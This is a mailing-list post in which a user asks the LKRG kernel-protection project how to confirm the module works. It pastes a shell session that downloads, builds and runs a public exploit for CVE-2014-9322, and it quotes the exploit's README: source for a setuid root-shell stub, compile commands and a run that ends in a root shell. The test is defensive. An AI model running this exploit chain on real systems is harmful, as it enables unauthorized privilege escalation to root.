[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 10 Jun 2020 09:59:14 +0200
From: Jacek <wampir990@...il.com>
To: lkrg-users@...ts.openwall.com
Subject: How can I check the effectiveness of p_lkrg?
Hi
How can I check if p_lkrg is working properly or is it only working?
I tested some exploits, there is no trace in the logs of any p_lkrg action.
LKRG version:
# root ~> cat /ssdtmp/lkrg-main/.git/FETCH_HEAD
ee1263aa66d9a9a394d66838e585176ebc73c3bb branch 'master' of
https://bitbucket.org/Adam_pi3/lkrg-main
History of recent tests:
# pies ~> cd /var/tmp/pies
# G1 Gentuś ### śro cze 10 09:05:31 domek : /var/tmp/pies
# pies ~> ls
setuid-wrapper.c suid
# G1 Gentuś ### śro cze 10 09:05:34 domek : /var/tmp/pies
# pies ~> ./suid bash
# G1 Gentuś ### śro cze 10 09:05:42 domek : /var/tmp/pies
# root ~> rmmod p_lkrg
# G1 Gentuś ### śro cze 10 09:06:56 domek : /var/tmp/pies
# root ~> dmesg -c
[16872.196158] [p_lkrg] Unloading LKRG...
[16872.225456] Freezing user space processes ... (elapsed 0.003 seconds)
done.
[16872.228647] OOM killer disabled.
[16878.257552] OOM killer enabled.
[16878.257555] Restarting tasks ... done.
[16878.260793] [p_lkrg] LKRG unloaded!
# G1 Gentuś ### śro cze 10 09:49:55 domek : ~
# root ~> modprobe p_lkrg
# G1 Gentuś ### śro cze 10 09:50:09 domek : ~
# root ~> dmesg -c | grep lkrg
[17710.583319] [p_lkrg] LKRG unloaded!
[17719.925962] [p_lkrg] Loading LKRG...
[17719.925965] [p_lkrg] System does NOT support SMAP. LKRG can't enforce
SMAP validation :(
[17719.934585] [p_lkrg] 4/23 UMH paths were whitelisted...
[17724.280767] [p_lkrg] LKRG initialized successfully!
# G1 Gentuś ### śro cze 10 09:51:43 domek : ~
# root ~> sysctl -a | grep lkrg
lkrg.block_modules = 0
lkrg.heartbeat = 0
lkrg.hide = 0
lkrg.interval = 15
lkrg.kint_enforce = 2
lkrg.kint_validate = 3
lkrg.log_level = 3
lkrg.msr_validate = 1
lkrg.pcfi_enforce = 1
lkrg.pcfi_validate = 2
lkrg.pint_enforce = 1
lkrg.pint_validate = 2
lkrg.profile_enforce = 9
lkrg.profile_validate = 9
lkrg.smap_enforce = 0
lkrg.smap_validate = 0
lkrg.smep_enforce = 2
lkrg.smep_validate = 1
lkrg.trigger = 0
lkrg.umh_enforce = 1
lkrg.umh_validate = 1
# G1 Gentuś ### śro cze 10 09:06:59 domek : /var/tmp/pies
# root ~> e
exit
# G1 Gentuś ### śro cze 10 09:07:04 domek : /var/tmp/pies
# pies ~> ls -ld $PWD $PWD/*
drwxr-xr-x 2 pies pies 80 06-10 06:18 /var/tmp/pies
-rw------- 1 pies pies 167 06-10 06:18 /var/tmp/pies/setuid-wrapper.c
-rwsrwsrwx 1 root root 16064 06-10 06:18 /var/tmp/pies/suid
# G1 Gentuś ### śro cze 10 09:07:53 domek : /var/tmp/pies
# pies ~> id
uid=1004(pies) gid=1004(pies) grupy=1004(pies)
# G1 Gentuś ### śro cze 10 09:07:55 domek : /var/tmp/pies
# pies ~> groups
pies
# G1 Gentuś ### śro cze 10 09:07:59 domek : /var/tmp/pies
# pies ~> df .
System plików 1K-bl użyte dostępne %uż. zamont. na
tmpfs 12582912 18548 12564364 1% /var/tmp
# G1 Gentuś ### śro cze 10 09:08:07 domek : /var/tmp/pies
# pies ~> wget http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
--2020-06-10 09:26:53-- http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
Translacja site.pi3.com.pl... 185.238.74.129
Łączenie się z site.pi3.com.pl|185.238.74.129|:80... połączono.
Żądanie HTTP wysłano, oczekiwanie na odpowiedź... 200 OK
Długość: 5448 (5,3K) [application/x-gzip]
Zapis do: `p_cve-2014-9322.tar.gz'
p_cve-2014-9322.tar 100%[===================>] 5,32K --.-KB/s w
0s
2020-06-10 09:26:54 (340 MB/s) - zapisano `p_cve-2014-9322.tar.gz'
[5448/5448]
# G1 Gentuś ### śro cze 10 09:26:54 domek : /var/tmp/pies
# pies ~> rozpakuj p_cve-2014-9322.tar.gz
# G1 Gentuś ### śro cze 10 09:27:00 domek : /var/tmp/pies
# pies ~> ls
p_CVE-2014-9322 p_cve-2014-9322.tar.gz setuid-wrapper.c suid
# G1 Gentuś ### śro cze 10 09:27:02 domek : /var/tmp/pies
# pies ~> cd p_CVE-2014-9322/
# G1 Gentuś ### śro cze 10 09:27:08 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ls
db.h procrop.c README setss.S swapgs.c z_shell.c
# G1 Gentuś ### śro cze 10 09:27:09 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> cat README
[pi3@...alhost clean_9322]$ cat z_shell.c
#include <stdio.h>
int main(void) {
char *p_arg[] = { "/bin/sh", NULL };
setuid(0);
seteuid(0);
setgid(0);
setegid(0);
execv("/bin/sh",p_arg,NULL);
}
[pi3@...alhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@...alhost clean_9322]$ cp z_shell /tmp/pi3
[pi3@...alhost clean_9322]$ ls -al /tmp/pi3
-rwxrwxr-x 1 pi3 pi3 8764 April 6 23:09 /tmp/pi3
[pi3@...alhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@...alhost clean_9322]$ /tmp/pi3
sh-4.2$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
sh-4.2$ exit
exit
[pi3@...alhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@...alhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
swapgs.c: In function ‘main’:
swapgs.c:175:29: warning: cast from pointer to integer of different size
[-Wpointer-to-int-cast]
: "r"(4), "r"((int)p_to_d), "r"(1)
^
[pi3@...alhost clean_9322]$ ./procrop
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
Usage: ./procrop <number>
Number:
1 - kernel [3.11.10-301.fc20.x86_64]
[pi3@...alhost clean_9322]$ ./procrop 1 &
[1] 5827
[pi3@...alhost clean_9322]$
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$ ps aux |grep procr
pi3 5827 83.0 0.0 4304 320 pts/1 RL 23:12 0:05 ./procrop 1
pi3 5829 0.0 0.1 112660 916 pts/1 S+ 23:12 0:00 grep
--color=auto procr
[pi3@...alhost clean_9322]$ ./p_write8
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
Usage: ./p_write8 <number>
Number:
1 - kernel [3.11.10-301.fc20.x86_64]
[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$ ./p_write8 1
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[+] mmap() memory in first 2GB of address space... DONE!
[+] Preparing kernel structures... DONE! (ovbuf at 0x602140)
[+] Creating LDT for this process... DONE!
[+] Press enter to start fun-game...
[exploit] pthread
runningAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[1]+
Done ./procrop 1
Segmentation fault (core dumped)
[pi3@...alhost clean_9322]$ ls -al /tmp/pi3
-rwsrwsrwx 1 root root 8764 April 6 23:09 /tmp/pi3
[pi3@...alhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@...alhost clean_9322]$ /tmp/pi3
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1000(pi3)
sh-4.2# exit
exit
[pi3@...alhost clean_9322]$
# G1 Gentuś ### śro cze 10 09:27:17 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> gcc -o procrop procrop.c setss.S
procrop.c: In function ‘FC_20_def_prep_root’:
procrop.c:64:3: warning: implicit declaration of function ‘chdir’
[-Wimplicit-function-declaration]
64 | chdir("/proc");
| ^~~~~
procrop.c: In function ‘trigger’:
procrop.c:94:12: warning: implicit declaration of function ‘getuid’
[-Wimplicit-function-declaration]
94 | if (!getuid()) {
| ^~~~~~
procrop.c:97:10: warning: implicit declaration of function ‘execv’
[-Wimplicit-function-declaration]
97 | execv("/bin/sh",p_argv,NULL);
| ^~~~~
procrop.c:97:10: warning: too many arguments to built-in function
‘execv’ expecting 2 [-Wbuiltin-declaration-mismatch]
procrop.c:102:7: warning: implicit declaration of function ‘close’; did
you mean ‘pclose’? [-Wimplicit-function-declaration]
102 | close(fd);
| ^~~~~
| pclose
procrop.c: In function ‘main’:
procrop.c:129:4: warning: implicit declaration of function ‘sleep’
[-Wimplicit-function-declaration]
129 | sleep(1);
| ^~~~~
# G1 Gentuś ### śro cze 10 09:27:54 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ls
db.h procrop procrop.c README setss.S swapgs.c z_shell.c
# G1 Gentuś ### śro cze 10 09:27:57 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> cat README | grep gcc
[pi3@...alhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@...alhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@...alhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
# G1 Gentuś ### śro cze 10 09:28:04 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> gcc z_shell.c -o z_shell
z_shell.c: In function ‘main’:
z_shell.c:7:4: warning: implicit declaration of function ‘setuid’
[-Wimplicit-function-declaration]
7 | setuid(0);
| ^~~~~~
z_shell.c:8:4: warning: implicit declaration of function ‘seteuid’
[-Wimplicit-function-declaration]
8 | seteuid(0);
| ^~~~~~~
z_shell.c:9:4: warning: implicit declaration of function ‘setgid’
[-Wimplicit-function-declaration]
9 | setgid(0);
| ^~~~~~
z_shell.c:10:4: warning: implicit declaration of function ‘setegid’
[-Wimplicit-function-declaration]
10 | setegid(0);
| ^~~~~~~
z_shell.c:11:4: warning: implicit declaration of function ‘execv’
[-Wimplicit-function-declaration]
11 | execv("/bin/sh",p_arg,NULL);
| ^~~~~
z_shell.c:11:4: warning: too many arguments to built-in function ‘execv’
expecting 2 [-Wbuiltin-declaration-mismatch]
# G1 Gentuś ### śro cze 10 09:28:13 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> cat README | grep gcc
[pi3@...alhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@...alhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@...alhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
# G1 Gentuś ### śro cze 10 09:28:16 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> gcc -o p_write8 swapgs.c setss.S -lpthread
swapgs.c: In function ‘exploit’:
swapgs.c:58:8: warning: implicit declaration of function ‘arch_prctl’
[-Wimplicit-function-declaration]
58 | if (arch_prctl(ARCH_SET_GS, percpu)) {
| ^~~~~~~~~~
swapgs.c:62:4: warning: implicit declaration of function ‘setss’; did
you mean ‘setsid’? [-Wimplicit-function-declaration]
62 | setss(15);
| ^~~~~
| setsid
swapgs.c: In function ‘main’:
swapgs.c:175:29: warning: cast from pointer to integer of different size
[-Wpointer-to-int-cast]
175 | : "r"(4), "r"((int)p_to_d), "r"(1)
| ^
# G1 Gentuś ### śro cze 10 09:28:25 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ls
db.h procrop.c README swapgs.c z_shell.c
procrop p_write8 setss.S z_shell
# G1 Gentuś ### śro cze 10 09:28:27 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ./z_shell
# G1 Gentuś ### śro cze 10 09:28:36 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ./procrop 1
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
mmap: Operation not permitted
# G1 Gentuś ### śro cze 10 09:29:51 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ./procrop 1
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
mmap: Operation not permitted
# G1 Gentuś ### śro cze 10 09:30:16 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ps aux|grep procrop
pies 25982 0.0 0.0 10712 812 pts/0 S+ 09:30 0:00 grep
procrop
# G1 Gentuś ### śro cze 10 09:30:19 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ./p_write8 1
...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
by Rafal 'n3rgal' Wojtczuk
&& Adam 'pi3' Zabrocki
[+] Using kernel target: 3.11.10-301.fc20.x86_64
[+] mmap() memory in first 2GB of address space... DONE!
[+] Preparing kernel structures... DONE! (ovbuf at 0x564256de5020)
syscall :(] Creating LDT for this process...
: Function not implemented
# G1 Gentuś ### śro cze 10 09:30:30 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~> ./z_shell 1
# G1 Gentuś ### śro cze 10 09:31:05 domek :
/var/tmp/pies/p_CVE-2014-9322
# pies ~>
# G1 Gentuś ### śro cze 10 09:56:34 domek : ~
# root ~> dmesg | grep lkrg
# G1 Gentuś ### śro cze 10 09:56:53 domek : ~
Cheers
Content of type "text/html" skipped
Download attachment "signature.asc" of type "application/pgp-signature" (229 bytes)
Powered by blists - more mailing lists
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
